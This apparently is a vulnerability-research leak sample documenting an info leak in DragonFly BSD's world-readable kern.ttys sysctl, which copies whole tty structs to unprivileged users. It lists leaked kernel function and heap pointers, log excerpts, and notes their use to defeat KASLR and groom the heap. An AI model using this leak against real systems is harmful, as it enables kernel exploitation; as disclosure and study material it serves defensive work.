DF-0006 / leak_sample.txt
# DF-0006 leak sample — kernel function/heap pointers leaked via kern.ttys # Guest: DragonFly 6.5-DEVELOPMENT v6.5.0.1712.g89e6a-DEVELOPMENT (amd64) # Reader: uid=1001 (maxx), NOT in wheel. Node: kern.ttys (CTLFLAG_RD, world-read) # # sysctl_kern_ttys (sys/kern/tty.c:2891-2921) does t = *tp; (whole struct), # sanitizes ONLY t_dev, then SYSCTL_OUT(&t, sizeof(t)). struct tty is 376 bytes; # 10 ttys -> 3760 bytes leaked. Scanned at 8-byte stride for canonical-upper-half # kernel addresses (>= 0xffff800000000000). # # 102 kernel-range pointer-sized values leaked per run. Function pointers are # the KASLR-defeat primitive: they match `nm /boot/kernel/kernel` symbols EXACTLY. ## function pointers (struct tty intra-offset 256/264/272 = t_oproc/t_stop/t_param) ## leaked value tty driver nm symbol type match 0xffffffff80b8b800 (x8) syscons scstart+0x0 T EXACT 0xffffffff806b7eb0 (x8) generic nottystop+0x0 T EXACT 0xffffffff80b86930 (x8) syscons scparam+0x0 t EXACT 0xffffffff80c2e9b0 (x1) serial com comstart+0x0 t EXACT 0xffffffff80c2fe30 (x1) serial com comstop+0x0 t EXACT 0xffffffff80c30120 (x1) serial com comparam+0x0 t EXACT 0xffffffff810e1280 (x1) (t_list) tty_list+0x0 d EXACT ## heap / direct-map pointers (c_data buffers, t_pgrp/t_session, t_token) ## leaked value intra-off nm nearest 0xfffff800abac7600 (x10) 352 (global token, identical across all 10 ttys) 0xfffff80065c84c00.. 48 t_rawq.c_data (clist data buffers) 0xfffff800ab6d2800.. 80 t_canq.c_data 0xfffff80066828000.. 112 t_outq.c_data 0xfffff80046186370.. 160 t_pgrp (pgrp slab objects) 0xfffff80065bfd098.. 168 t_session (session slab objects) 0xffffffff80d86d34 (x10) 24 lwkt_token internal (db_lengths+0x16c region) ## decisive excerpt from run.log got 3760 bytes from kern.ttys raw blob written to ttys.bin (3760 bytes) blob offset 24 (word 3): 0xffffffff80d86d34 ... blob offset 256 (word 32): 0xffffffff80b8b800 <- t_oproc = scstart (.text) blob offset 264 (word 33): 0xffffffff806b7eb0 <- t_stop = nottystop (.text) blob offset 272 (word 34): 0xffffffff80b86930 <- t_param = scparam (.text) ... total kernel-range pointer-sized values leaked: 102 RUN_EXIT=0 ## interpretation The leaked .text function-pointer values (scstart/nottystop/scparam/comstart/ comstop/comparam) EXACTLY equal their static `nm /boot/kernel/kernel` addresses, so this build has no KASLR slide at the tty function pointers; an attacker reads the precise kernel .text base from an unprivileged account. The 0xfffff8xxxxxxxxxx values are live slab/direct-map addresses (clist buffers, pgrp/session objects), revealing kernel heap layout for grooming a separate heap-corruption bug. ## variance across 3 runs (same boot) run.log / run.2.log / run.3.log : identical "102 kernel-range pointers leaked"; function-pointer addresses byte-identical across runs (stable .text); slab addresses byte-identical within the boot (stable slab layout). Across a reboot the slab addresses change but the .text addresses stay fixed (no KASLR).